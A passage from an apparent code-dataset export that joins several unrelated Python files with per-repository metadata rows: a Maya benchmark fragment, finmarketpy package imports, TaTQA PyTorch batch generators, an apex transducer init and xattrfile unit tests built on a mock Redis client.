        for _ in OpenMaya.MDagPath.bnFind(pattern='*', copy=False):
            pass

    def benchBnFind7(self):
        for _ in OpenMaya.MDagPath.bnFind(pattern='*', recursive=False):
            pass

    def benchBnFind8(self):
        for _ in OpenMaya.MDagPath.bnFind(pattern='*', recursive=False,
                                          copy=False):
            pass
if __name__ == '__main__':
    # Delegate to the shared benchmark runner so bench* methods are timed
    # and reported consistently across benchmark modules.
    from benchmarks.run import run
    run('__main__')
| 26.644295
| 77
| 0.610579
| 402
| 3,970
| 5.915423
| 0.21393
| 0.141295
| 0.109336
| 0.176619
| 0.757359
| 0.731707
| 0.724979
| 0.724979
| 0.724979
| 0.724979
| 0
| 0.01574
| 0.279849
| 3,970
| 148
| 78
| 26.824324
| 0.81602
| 0.005038
| 0
| 0.669725
| 0
| 0
| 0.010129
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.211009
| false
| 0.183486
| 0.082569
| 0
| 0.321101
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
b4b86fd4066f75eafe3b9477eb2fc2bf54c9440d
| 269
|
py
|
Python
|
finmarketpy/backtest/__init__.py
|
aidowu1/finmarketpy
|
1ceee46bb5378ee46d8270fc604acf474ae32739
|
[
"Apache-2.0"
] | 1,701
|
2016-08-17T15:45:40.000Z
|
2022-03-30T14:05:21.000Z
|
finmarketpy/backtest/__init__.py
|
mhockenberger/finmarketpy
|
2a20026877153aa048896632457dcfb20f65c0b0
|
[
"Apache-2.0"
] | 26
|
2017-01-09T18:54:27.000Z
|
2021-06-29T15:32:03.000Z
|
finmarketpy/backtest/__init__.py
|
mhockenberger/finmarketpy
|
2a20026877153aa048896632457dcfb20f65c0b0
|
[
"Apache-2.0"
] | 342
|
2016-09-01T11:36:00.000Z
|
2022-03-27T00:56:55.000Z
|
# Package author metadata.
__author__ = 'saeedamen'
from finmarketpy.backtest.backtestengine import Backtest
from finmarketpy.backtest.backtestrequest import BacktestRequest
from finmarketpy.backtest.backtestengine import TradingModel
from finmarketpy.backtest.tradeanalysis import TradeAnalysis
| 44.833333
| 64
| 0.888476
| 26
| 269
| 9.038462
| 0.384615
| 0.255319
| 0.391489
| 0.314894
| 0.365957
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.070632
| 269
| 6
| 65
| 44.833333
| 0.94
| 0
| 0
| 0
| 0
| 0
| 0.033333
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.8
| 0
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b4e4534679886cfddb9d1d07fa70f9d6176e0f45
| 12,339
|
py
|
Python
|
tag_op/data/tatqa_batch_gen.py
|
huwarr/TAT-QA
|
2ae9d2ad869a6eebcc79c15d5f300644e5e31e66
|
[
"MIT"
] | 23
|
2021-05-25T06:01:21.000Z
|
2022-02-27T07:16:45.000Z
|
tag_op/data/tatqa_batch_gen.py
|
huwarr/TAT-QA
|
2ae9d2ad869a6eebcc79c15d5f300644e5e31e66
|
[
"MIT"
] | 5
|
2021-07-28T08:41:51.000Z
|
2022-03-08T08:08:42.000Z
|
tag_op/data/tatqa_batch_gen.py
|
huwarr/TAT-QA
|
2ae9d2ad869a6eebcc79c15d5f300644e5e31e66
|
[
"MIT"
] | 12
|
2021-06-13T13:20:29.000Z
|
2022-03-28T14:11:00.000Z
|
import os
import pickle
import torch
import random
class TaTQABatchGen(object):
    """Iterable batch generator over cached TAT-QA TagOp features.

    Loads pickled features from ``args.data_dir`` and yields dict batches
    of stacked tensors. Sequences are fixed-length 512 (see the
    ``LongTensor(bsz, 512)`` buffers in ``__iter__``).
    """

    def __init__(self, args, data_mode, encoder='roberta'):
        # Cache file naming convention: tagop_<encoder>_cached_<mode>.pkl
        dpath = f"tagop_{encoder}_cached_{data_mode}.pkl"
        self.is_train = data_mode == "train"
        self.args = args
        with open(os.path.join(args.data_dir, dpath), 'rb') as f:
            print("Load data from {}.".format(dpath))
            # NOTE(review): pickle.load on a cache file — assumed to be a
            # locally produced, trusted artifact.
            data = pickle.load(f)
        all_data = []
        for item in data:
            # Tensor features (numpy arrays in the cache, converted here).
            input_ids = torch.from_numpy(item["input_ids"])
            attention_mask = torch.from_numpy(item["attention_mask"])
            token_type_ids = torch.from_numpy(item["token_type_ids"])
            paragraph_mask = torch.from_numpy(item["paragraph_mask"])
            table_mask = torch.from_numpy(item["table_mask"])
            # Non-tensor payloads are carried through as-is.
            paragraph_numbers = item["paragraph_number_value"]
            table_cell_numbers = item["table_cell_number_value"]
            paragraph_index = torch.from_numpy(item["paragraph_index"])
            table_cell_index = torch.from_numpy(item["table_cell_index"])
            tag_labels = torch.from_numpy(item["tag_labels"])
            operator_labels = torch.tensor(item["operator_label"])
            scale_labels = torch.tensor(item["scale_label"])
            number_order_labels = torch.tensor(item["number_order_label"])
            gold_answers = item["answer_dict"]
            paragraph_tokens = item["paragraph_tokens"]
            table_cell_tokens = item["table_cell_tokens"]
            question_id = item["question_id"]
            # Field order here must match the zip(*batch) unpacking in __iter__.
            all_data.append((input_ids, attention_mask, token_type_ids, paragraph_mask, table_mask, paragraph_index,
                             table_cell_index, tag_labels, operator_labels, scale_labels, number_order_labels, gold_answers,
                             paragraph_tokens, table_cell_tokens, paragraph_numbers, table_cell_numbers, question_id))
        print("Load data size {}.".format(len(all_data)))
        self.data = TaTQABatchGen.make_batches(all_data, args.batch_size if self.is_train else args.eval_batch_size,
                                               self.is_train)
        self.offset = 0

    @staticmethod
    def make_batches(data, batch_size=32, is_train=True):
        """Split ``data`` into batches; shuffle first when training.

        In training, the final short batch is padded by wrapping around to
        the front of ``data``, so every batch has exactly ``batch_size``
        items; in eval the last batch may be shorter.
        """
        if is_train:
            random.shuffle(data)
        if is_train:
            return [
                data[i: i + batch_size] if i + batch_size < len(data) else data[i:] + data[
                    :i + batch_size - len(data)]
                for i in range(0, len(data), batch_size)]
        return [data[i:i + batch_size] for i in range(0, len(data), batch_size)]

    def reset(self):
        """Rewind iteration; in training also reshuffle batches and items."""
        if self.is_train:
            indices = list(range(len(self.data)))
            random.shuffle(indices)
            self.data = [self.data[i] for i in indices]
            for i in range(len(self.data)):
                random.shuffle(self.data[i])
        self.offset = 0

    def __len__(self):
        # Number of batches, not number of examples.
        return len(self.data)

    def __iter__(self):
        while self.offset < len(self):
            batch = self.data[self.offset]
            self.offset += 1
            # Unpack per-field tuples; order mirrors the append in __init__.
            input_ids_batch, attention_mask_batch, token_type_ids_batch, paragraph_mask_batch, table_mask_batch, \
                paragraph_index_batch, table_cell_index_batch, tag_labels_batch, operator_labels_batch, scale_labels_batch, \
                number_order_labels_batch, gold_answers_batch, paragraph_tokens_batch, \
                table_cell_tokens_batch, paragraph_numbers_batch, table_cell_numbers_batch, question_ids_batch = zip(*batch)
            bsz = len(batch)
            # Preallocate batch buffers (uninitialized except token_type_ids);
            # every row is overwritten in the fill loop below.
            input_ids = torch.LongTensor(bsz, 512)
            attention_mask = torch.LongTensor(bsz, 512)
            token_type_ids = torch.LongTensor(bsz, 512).fill_(0)
            paragraph_mask = torch.LongTensor(bsz, 512)
            table_mask = torch.LongTensor(bsz, 512)
            paragraph_index = torch.LongTensor(bsz, 512)
            table_cell_index = torch.LongTensor(bsz, 512)
            tag_labels = torch.LongTensor(bsz, 512)
            operator_labels = torch.LongTensor(bsz)
            scale_labels = torch.LongTensor(bsz)
            number_order_labels = torch.LongTensor(bsz)
            paragraph_tokens = []
            table_cell_tokens = []
            gold_answers = []
            question_ids = []
            paragraph_numbers = []
            table_cell_numbers = []
            for i in range(bsz):
                input_ids[i] = input_ids_batch[i]
                attention_mask[i] = attention_mask_batch[i]
                token_type_ids[i] = token_type_ids_batch[i]
                paragraph_mask[i] = paragraph_mask_batch[i]
                table_mask[i] = table_mask_batch[i]
                paragraph_index[i] = paragraph_index_batch[i]
                table_cell_index[i] = table_cell_index_batch[i]
                tag_labels[i] = tag_labels_batch[i]
                operator_labels[i] = operator_labels_batch[i]
                scale_labels[i] = scale_labels_batch[i]
                number_order_labels[i] = number_order_labels_batch[i]
                paragraph_tokens.append(paragraph_tokens_batch[i])
                table_cell_tokens.append(table_cell_tokens_batch[i])
                paragraph_numbers.append(paragraph_numbers_batch[i])
                table_cell_numbers.append(table_cell_numbers_batch[i])
                gold_answers.append(gold_answers_batch[i])
                question_ids.append(question_ids_batch[i])
            out_batch = {"input_ids": input_ids, "attention_mask": attention_mask, "token_type_ids": token_type_ids,
                         "paragraph_mask": paragraph_mask, "paragraph_index": paragraph_index, "tag_labels": tag_labels,
                         "operator_labels": operator_labels, "scale_labels": scale_labels, "number_order_labels": number_order_labels,
                         "paragraph_tokens": paragraph_tokens, "table_cell_tokens": table_cell_tokens, "paragraph_numbers": paragraph_numbers,
                         "table_cell_numbers": table_cell_numbers, "gold_answers": gold_answers, "question_ids": question_ids,
                         "table_mask": table_mask, "table_cell_index": table_cell_index,
                         }
            if self.args.cuda:
                # Only tensor values are moved to GPU; list payloads stay on host.
                for k in out_batch.keys():
                    if isinstance(out_batch[k], torch.Tensor):
                        out_batch[k] = out_batch[k].cuda()
            yield out_batch
class TaTQATestBatchGen(object):
    """Batch generator over cached (pickled) TaTQA test/dev examples.

    Reads ``tagop_{encoder}_cached_{data_mode}.pkl`` from
    ``args.test_data_dir``, wraps each example's numpy arrays as torch
    tensors, groups examples into batches and, on iteration, yields each
    batch as a dict (tensor entries moved to GPU when ``args.cuda`` is set).
    """

    def __init__(self, args, data_mode, encoder='roberta'):
        """Load the cached dataset and pre-build the batch list.

        :param args: namespace providing ``test_data_dir``, ``batch_size``,
            ``eval_batch_size`` and ``cuda``.
        :param data_mode: split name; ``"train"`` enables shuffling and
            full-size (wrapped) batches.
        :param encoder: encoder name embedded in the cache file name.
        """
        dpath = f"tagop_{encoder}_cached_{data_mode}.pkl"
        self.is_train = data_mode == "train"
        self.args = args
        # Build the cache path once instead of joining it twice.
        cache_path = os.path.join(args.test_data_dir, dpath)
        print(cache_path)
        with open(cache_path, 'rb') as f:
            print("Load data from {}.".format(dpath))
            data = pickle.load(f)
        # Post-load processing happens outside the `with` so the file handle
        # is released as early as possible.
        all_data = []
        for item in data:
            # Fixed-length encodings/masks/labels arrive as numpy arrays;
            # wrap them as tensors without copying.
            input_ids = torch.from_numpy(item["input_ids"])
            attention_mask = torch.from_numpy(item["attention_mask"])
            token_type_ids = torch.from_numpy(item["token_type_ids"])
            paragraph_mask = torch.from_numpy(item["paragraph_mask"])
            table_mask = torch.from_numpy(item["table_mask"])
            paragraph_index = torch.from_numpy(item["paragraph_index"])
            table_cell_index = torch.from_numpy(item["table_cell_index"])
            tag_labels = torch.from_numpy(item["tag_labels"])
            # Variable-length / non-numeric fields stay as plain Python objects.
            paragraph_numbers = item["paragraph_number_value"]
            table_cell_numbers = item["table_cell_number_value"]
            gold_answers = item["answer_dict"]
            paragraph_tokens = item["paragraph_tokens"]
            table_cell_tokens = item["table_cell_tokens"]
            question_id = item["question_id"]
            # Tuple order must match the unpacking order in __iter__.
            all_data.append((input_ids, attention_mask, token_type_ids, paragraph_mask, table_mask,
                             paragraph_index, table_cell_index, tag_labels, gold_answers,
                             paragraph_tokens, table_cell_tokens, paragraph_numbers,
                             table_cell_numbers, question_id))
        print("Load data size {}.".format(len(all_data)))
        self.data = TaTQATestBatchGen.make_batches(
            all_data, args.batch_size if self.is_train else args.eval_batch_size, self.is_train)
        self.offset = 0

    @staticmethod
    def make_batches(data, batch_size=32, is_train=True):
        """Partition ``data`` into batches of ``batch_size``.

        Train mode shuffles ``data`` in place first and wraps the final
        short batch around to the front of the list, so every train batch
        has exactly ``batch_size`` items. Eval mode preserves order and
        allows a short last batch.
        """
        if is_train:
            # Single is_train branch (the original tested the flag twice).
            random.shuffle(data)
            return [
                data[i: i + batch_size] if i + batch_size < len(data)
                else data[i:] + data[:i + batch_size - len(data)]
                for i in range(0, len(data), batch_size)]
        return [data[i:i + batch_size] for i in range(0, len(data), batch_size)]

    def reset(self):
        """Re-shuffle batch order and batch contents (train only); rewind."""
        if self.is_train:
            # Equivalent to shuffling an index list and re-indexing,
            # but without the intermediate list.
            random.shuffle(self.data)
            for batch in self.data:
                random.shuffle(batch)
        self.offset = 0

    def __len__(self):
        """Return the number of batches."""
        return len(self.data)

    def __iter__(self):
        """Yield one collated batch dict at a time, resuming from ``self.offset``."""
        while self.offset < len(self):
            batch = self.data[self.offset]
            self.offset += 1
            input_ids_batch, attention_mask_batch, token_type_ids_batch, paragraph_mask_batch, \
                table_mask_batch, paragraph_index_batch, table_cell_index_batch, tag_labels_batch, \
                gold_answers_batch, paragraph_tokens_batch, table_cell_tokens_batch, \
                paragraph_numbers_batch, table_cell_numbers_batch, question_ids_batch = zip(*batch)
            bsz = len(batch)
            # Pre-allocate fixed-size (bsz x 512) tensors and fill them row by row.
            # NOTE(review): assumes every cached encoding is exactly 512 tokens — confirm
            # against the preprocessing code.
            input_ids = torch.LongTensor(bsz, 512)
            attention_mask = torch.LongTensor(bsz, 512)
            token_type_ids = torch.LongTensor(bsz, 512).fill_(0)
            paragraph_mask = torch.LongTensor(bsz, 512)
            table_mask = torch.LongTensor(bsz, 512)
            paragraph_index = torch.LongTensor(bsz, 512)
            table_cell_index = torch.LongTensor(bsz, 512)
            tag_labels = torch.LongTensor(bsz, 512)
            paragraph_tokens = []
            table_cell_tokens = []
            gold_answers = []
            question_ids = []
            paragraph_numbers = []
            table_cell_numbers = []
            for i in range(bsz):
                input_ids[i] = input_ids_batch[i]
                attention_mask[i] = attention_mask_batch[i]
                token_type_ids[i] = token_type_ids_batch[i]
                paragraph_mask[i] = paragraph_mask_batch[i]
                table_mask[i] = table_mask_batch[i]
                paragraph_index[i] = paragraph_index_batch[i]
                table_cell_index[i] = table_cell_index_batch[i]
                tag_labels[i] = tag_labels_batch[i]
                paragraph_tokens.append(paragraph_tokens_batch[i])
                table_cell_tokens.append(table_cell_tokens_batch[i])
                paragraph_numbers.append(paragraph_numbers_batch[i])
                table_cell_numbers.append(table_cell_numbers_batch[i])
                gold_answers.append(gold_answers_batch[i])
                question_ids.append(question_ids_batch[i])
            out_batch = {"input_ids": input_ids, "attention_mask": attention_mask,
                         "token_type_ids": token_type_ids, "paragraph_mask": paragraph_mask,
                         "paragraph_index": paragraph_index, "tag_labels": tag_labels,
                         "paragraph_tokens": paragraph_tokens, "table_cell_tokens": table_cell_tokens,
                         "paragraph_numbers": paragraph_numbers,
                         "table_cell_numbers": table_cell_numbers, "gold_answers": gold_answers,
                         "question_ids": question_ids, "table_mask": table_mask,
                         "table_cell_index": table_cell_index,
                         }
            if self.args.cuda:
                # Move only tensor entries to GPU; token/number lists stay on CPU.
                for k, v in out_batch.items():
                    if isinstance(v, torch.Tensor):
                        out_batch[k] = v.cuda()
            yield out_batch
| 52.730769
| 133
| 0.609044
| 1,477
| 12,339
| 4.714963
| 0.07109
| 0.069787
| 0.04911
| 0.041356
| 0.923894
| 0.911689
| 0.898478
| 0.898478
| 0.891585
| 0.891585
| 0
| 0.007366
| 0.29581
| 12,339
| 234
| 134
| 52.730769
| 0.794107
| 0.008348
| 0
| 0.846512
| 0
| 0
| 0.086399
| 0.013569
| 0
| 0
| 0
| 0
| 0
| 1
| 0.046512
| false
| 0
| 0.018605
| 0.009302
| 0.102326
| 0.023256
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2c294687cff49dde4cfd4c5ae0ee394995ad200c
| 78
|
py
|
Python
|
apex/apex/contrib/transducer/__init__.py
|
DominickZhang/Distillation-Swin-Transformer
|
6fc7b25bd558edb14e6f15715f53612c37e5166f
|
[
"MIT"
] | 1
|
2022-02-27T11:21:54.000Z
|
2022-02-27T11:21:54.000Z
|
apex/apex/contrib/transducer/__init__.py
|
DominickZhang/Distillation-Swin-Transformer
|
6fc7b25bd558edb14e6f15715f53612c37e5166f
|
[
"MIT"
] | 1
|
2022-02-23T14:43:58.000Z
|
2022-02-23T14:43:58.000Z
|
apex/apex/contrib/transducer/__init__.py
|
DominickZhang/Distillation-Swin-Transformer
|
6fc7b25bd558edb14e6f15715f53612c37e5166f
|
[
"MIT"
] | 2
|
2021-07-07T21:47:34.000Z
|
2021-07-07T21:53:17.000Z
|
from .transducer import TransducerJoint
from .transducer import TransducerLoss
| 39
| 39
| 0.884615
| 8
| 78
| 8.625
| 0.625
| 0.405797
| 0.57971
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.089744
| 78
| 2
| 40
| 39
| 0.971831
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2595c18ca7e6030d892e6ef99ffb89715994ea31
| 14,040
|
py
|
Python
|
tests/test_basic.py
|
metwork-framework/xattrfile
|
ab9b0d9e74f24c3ee05827e811430f80f1f7faf2
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_basic.py
|
metwork-framework/xattrfile
|
ab9b0d9e74f24c3ee05827e811430f80f1f7faf2
|
[
"BSD-3-Clause"
] | 1
|
2022-01-06T13:24:35.000Z
|
2022-01-12T08:49:27.000Z
|
tests/test_basic.py
|
metwork-framework/xattrfile
|
ab9b0d9e74f24c3ee05827e811430f80f1f7faf2
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
from mockredis import mock_redis_client
from unittest import TestCase
from xattrfile import XattrFile
from functools import partial
RED = None
def unittests_get_redis_callable():
    """Lazily create and return the process-wide mock Redis client.

    The client is cached in the module-level ``RED`` so every XattrFile
    built by the test suite shares one in-memory store.
    """
    global RED
    if RED is not None:
        return RED
    RED = mock_redis_client()
    return RED
def make_xattrfile(filepath):
    """Wrap *filepath* in an XattrFile bound to the shared mock Redis client."""
    factory_kwargs = {"get_redis_callable": unittests_get_redis_callable}
    return XattrFile(filepath, **factory_kwargs)
class BasicTestCase(TestCase):
    """Tests for XattrFile tag persistence and copy/rename/move/delete semantics.

    Tags are backed by the shared mock Redis client returned by
    ``unittests_get_redis_callable``; ``setUp`` flushes it before every test
    so tests cannot leak tags into each other.
    """

    def setUp(self):
        # Fixture files live in a 'data' directory next to this test module.
        self.test_data_dir_path = os.path.join(os.path.dirname(__file__),
                                               'data')
        # Start every test with an empty mock Redis database.
        unittests_get_redis_callable().flushdb()

    def test_02_write_tags(self):
        """Tags flushed with _write_tags are visible to a freshly built XattrFile."""
        test_data_file_path = os.path.join(self.test_data_dir_path,
                                           u'test_file.json')
        x = make_xattrfile(test_data_file_path)
        x.tags['key1'] = b'value1'
        x._write_tags()
        y = make_xattrfile(test_data_file_path)
        self.assertEqual(y.tags['key1'], b'value1')

    def test_03_file_not_found(self):
        """Opening a missing file raises IOError with errno 2 (ENOENT)."""
        errno = 0
        strerror = ''
        try:
            make_xattrfile(u'data/test_file_missing.json')
        except IOError as io_excep:
            errno = io_excep.errno
            strerror = io_excep.strerror
        self.assertEqual(errno, 2)
        self.assertEqual(strerror, 'No such file or directory')

    def test_05_write_no_tags(self):
        """_write_tags with an empty tag set must not create a Redis key."""
        test_data_file_path = os.path.join(self.test_data_dir_path,
                                           u'test_file.json')
        x = make_xattrfile(test_data_file_path)
        x._write_tags()
        r = x.get_redis_callable()
        self.assertFalse(r.exists(x._redis_key))

    def test_06_copy_file_tags(self):
        """copy() carries the source file's tags over to the copy."""
        test_data_file_path = os.path.join(self.test_data_dir_path,
                                           u'test_file.json')
        tmp_data_file_path = os.path.join(self.test_data_dir_path,
                                          u'test_file.tmp')
        x = make_xattrfile(test_data_file_path)
        x.tags['key1'] = b'value1'
        x.copy(tmp_data_file_path)
        y = make_xattrfile(tmp_data_file_path)
        self.assertEqual(y.tags['key1'], b'value1')
        os.unlink(tmp_data_file_path)

    def test_07_copy_tags_on(self):
        """copy_tags_on() applies this file's tags to another existing file."""
        test_data_file_path = os.path.join(self.test_data_dir_path,
                                           u'test_file.json')
        test_data_file2_path = os.path.join(self.test_data_dir_path,
                                            u'test_fileb.json')
        x = make_xattrfile(test_data_file_path)
        x.tags['foo'] = b'bar'
        y = x.copy_tags_on(test_data_file2_path)
        self.assertEqual(y.tags['foo'], b'bar')

    def test_08_rename_file_tags(self):
        """rename() keeps the tags attached to the file at its new path."""
        test_data_file_path = os.path.join(self.test_data_dir_path,
                                           u'test_file.json')
        tmp_data_file_path = os.path.join(self.test_data_dir_path,
                                          u'test_file.tmp')
        tmp2_data_file_path = os.path.join(self.test_data_dir_path,
                                           'test2_file.tmp')
        x = make_xattrfile(test_data_file_path)
        x.tags['key1'] = b'value1'
        x.copy(tmp_data_file_path)
        y = make_xattrfile(tmp_data_file_path)
        y.rename(tmp2_data_file_path)
        y = make_xattrfile(tmp2_data_file_path)
        self.assertEqual(y.tags['key1'], b'value1')
        os.unlink(tmp2_data_file_path)

    def test_09_delete_file(self):
        """delete() removes the underlying file from disk."""
        test_data_file_path = os.path.join(self.test_data_dir_path,
                                           u'test_file.json')
        tmp_data_file_path = os.path.join(self.test_data_dir_path,
                                          u'test_file.tmp')
        x = make_xattrfile(test_data_file_path)
        x.tags['key1'] = b'value1'
        x.copy(tmp_data_file_path)
        y = make_xattrfile(tmp_data_file_path)
        y.delete()
        self.assertFalse(os.path.isfile(tmp_data_file_path))

    def test_10_basename(self):
        """basename() returns the file name without its directory part."""
        test_data_file_path = os.path.join(self.test_data_dir_path,
                                           u'test_file.json')
        x = make_xattrfile(test_data_file_path)
        self.assertEqual(x.basename(), u'test_file.json')

    def test_11_rename_file_no_tags(self):
        """Renaming a tag-less file works and the source keeps zero tags."""
        test_data_file_path = os.path.join(self.test_data_dir_path,
                                           u'test_file.json')
        tmp_data_file_path = os.path.join(self.test_data_dir_path,
                                          u'test_file.tmp')
        tmp2_data_file_path = os.path.join(self.test_data_dir_path,
                                           'test2_file.tmp')
        x = make_xattrfile(test_data_file_path)
        x.copy(tmp_data_file_path)
        y = make_xattrfile(tmp_data_file_path)
        y.rename(tmp2_data_file_path)
        y = make_xattrfile(tmp2_data_file_path)
        # NOTE(review): the assertion checks x (the original), not the renamed
        # y — presumably intentional, but worth confirming.
        self.assertEqual(len(x.tags), 0)
        os.unlink(tmp2_data_file_path)

    def test_13_rename_file_path(self):
        """rename() updates the object's filepath attribute in place."""
        test_data_file_path = os.path.join(self.test_data_dir_path,
                                           u'test_file.json')
        tmp_data_file_path = os.path.join(self.test_data_dir_path,
                                          u'test_file.tmp')
        tmp2_data_file_path = os.path.join(self.test_data_dir_path,
                                           'test2_file.tmp')
        x = make_xattrfile(test_data_file_path)
        x.copy(tmp_data_file_path)
        y = make_xattrfile(tmp_data_file_path)
        y.rename(tmp2_data_file_path)
        self.assertEqual(y.filepath, tmp2_data_file_path)
        os.unlink(tmp2_data_file_path)

    def test_14_move_or_copy(self):
        """move_or_copy() on the same filesystem: both flags True, source gone,
        destination exists with tags preserved."""
        test_data_file_path = os.path.join(self.test_data_dir_path,
                                           u'test_file.json')
        tmp_data_file_path = os.path.join(self.test_data_dir_path,
                                          u'test_file.tmp')
        tmp_data_file_path2 = os.path.join(self.test_data_dir_path,
                                           u'test_file.tmp2')
        x = make_xattrfile(test_data_file_path)
        x.tags['key1'] = b'value1'
        x.copy(tmp_data_file_path)
        y = make_xattrfile(tmp_data_file_path)
        r1, r2 = y.move_or_copy(tmp_data_file_path2)
        self.assertTrue(r1)
        self.assertTrue(r2)
        self.assertFalse(os.path.isfile(tmp_data_file_path))
        self.assertTrue(os.path.isfile(tmp_data_file_path2))
        self.assertEqual(make_xattrfile(
            tmp_data_file_path2).tags['key1'], b'value1')
        make_xattrfile(tmp_data_file_path2).delete()

    def test_14_move_or_copy2(self):
        """When os.rename fails, move_or_copy() falls back to copy+delete:
        r1 True, r2 False, source removed, tags preserved."""
        def os_rename_fake(old_os_rename, src_exception, dst_exception,
                           src, dst):
            # Delegate to the real os.rename except for the one src/dst pair
            # we want to fail, simulating e.g. a cross-device rename error.
            if src == src_exception:
                if dst == dst_exception:
                    raise OSError("fake rename error")
            res = old_os_rename(src, dst)
            return res
        test_data_file_path = os.path.join(self.test_data_dir_path,
                                           u'test_file.json')
        tmp_data_file_path = os.path.join(self.test_data_dir_path,
                                          u'test_file.tmp')
        tmp_data_file_path2 = os.path.join(self.test_data_dir_path,
                                           u'test_file.tmp2')
        x = make_xattrfile(test_data_file_path)
        x.tags['key1'] = b'value1'
        x.copy(tmp_data_file_path)
        y = make_xattrfile(tmp_data_file_path)
        # Monkeypatch os.rename for the duration of the call, then restore it.
        old_os_rename = os.rename
        os.rename = partial(os_rename_fake, old_os_rename,
                            y.filepath, tmp_data_file_path2)
        r1, r2 = y.move_or_copy(tmp_data_file_path2)
        os.rename = old_os_rename
        self.assertTrue(r1)
        self.assertFalse(r2)
        self.assertFalse(os.path.isfile(tmp_data_file_path))
        self.assertTrue(os.path.isfile(tmp_data_file_path2))
        self.assertEqual(make_xattrfile(
            tmp_data_file_path2).tags['key1'], b'value1')
        self.assertEqual(y.tags['key1'], b'value1')
        make_xattrfile(tmp_data_file_path2).delete()

    def test_14_hardlink_or_copy(self):
        """hardlink_or_copy(): both flags True, both paths exist, tags shared."""
        test_data_file_path = os.path.join(self.test_data_dir_path,
                                           u'test_file.json')
        tmp_data_file_path = os.path.join(self.test_data_dir_path,
                                          u'test_file.tmp')
        tmp_data_file_path2 = os.path.join(self.test_data_dir_path,
                                           u'test_file.tmp2')
        x = make_xattrfile(test_data_file_path)
        x.tags['key1'] = b'value1'
        x.copy(tmp_data_file_path)
        y = make_xattrfile(tmp_data_file_path)
        r1, r2 = y.hardlink_or_copy(tmp_data_file_path2)
        self.assertTrue(r1)
        self.assertTrue(r2)
        self.assertTrue(os.path.isfile(tmp_data_file_path))
        self.assertTrue(os.path.isfile(tmp_data_file_path2))
        self.assertEqual(make_xattrfile(
            tmp_data_file_path2).tags['key1'], b'value1')
        make_xattrfile(tmp_data_file_path).delete()
        make_xattrfile(tmp_data_file_path2).delete()

    def test_14_hardlink_or_copy2(self):
        """When os.link fails, hardlink_or_copy() falls back to a plain copy:
        r1 True, r2 False, both paths still exist, tags preserved."""
        def os_link_fake(old_os_link, src_exception, dst_exception,
                         src, dst):
            # Delegate to the real os.link except for the one src/dst pair we
            # want to fail, simulating e.g. a cross-device link error.
            if src == src_exception:
                if dst == dst_exception:
                    raise OSError("fake link error")
            res = old_os_link(src, dst)
            return res
        test_data_file_path = os.path.join(self.test_data_dir_path,
                                           u'test_file.json')
        tmp_data_file_path = os.path.join(self.test_data_dir_path,
                                          u'test_file.tmp')
        tmp_data_file_path2 = os.path.join(self.test_data_dir_path,
                                           u'test_file.tmp2')
        x = make_xattrfile(test_data_file_path)
        x.tags['key1'] = b'value1'
        x.copy(tmp_data_file_path)
        y = make_xattrfile(tmp_data_file_path)
        old_os_link = os.link
        # NOTE(review): the ".t" suffix presumably matches XattrFile's
        # temporary link target path — confirm against the implementation.
        os.link = partial(os_link_fake, old_os_link,
                          y.filepath, tmp_data_file_path2 + ".t")
        r1, r2 = y.hardlink_or_copy(tmp_data_file_path2)
        os.link = old_os_link
        self.assertTrue(r1)
        self.assertFalse(r2)
        self.assertTrue(os.path.isfile(tmp_data_file_path))
        self.assertTrue(os.path.isfile(tmp_data_file_path2))
        self.assertEqual(make_xattrfile(
            tmp_data_file_path2).tags['key1'], b'value1')
        make_xattrfile(tmp_data_file_path2).delete()

    def test_14_hardlink_or_copy3(self):
        """Same as test_14_hardlink_or_copy, but also deletes the source link."""
        test_data_file_path = os.path.join(self.test_data_dir_path,
                                           u'test_file.json')
        tmp_data_file_path = os.path.join(self.test_data_dir_path,
                                          u'test_file.tmp')
        tmp_data_file_path2 = os.path.join(self.test_data_dir_path,
                                           u'test_file.tmp2')
        x = make_xattrfile(test_data_file_path)
        x.tags['key1'] = b'value1'
        x.copy(tmp_data_file_path)
        y = make_xattrfile(tmp_data_file_path)
        r1, r2 = y.hardlink_or_copy(tmp_data_file_path2)
        self.assertTrue(r1)
        self.assertTrue(r2)
        self.assertTrue(os.path.isfile(tmp_data_file_path))
        self.assertTrue(os.path.isfile(tmp_data_file_path2))
        self.assertEqual(make_xattrfile(
            tmp_data_file_path2).tags['key1'], b'value1')
        make_xattrfile(tmp_data_file_path2).delete()
        make_xattrfile(tmp_data_file_path).delete()

    def test_15_read_tags(self):
        """_read_tags picks up tags written directly into Redis."""
        # Set tag manually in Redis, read tags and test if correctly read
        test_data_file_path = os.path.join(self.test_data_dir_path,
                                           u'test_file.json')
        x = make_xattrfile(test_data_file_path)
        r = x.get_redis_callable()
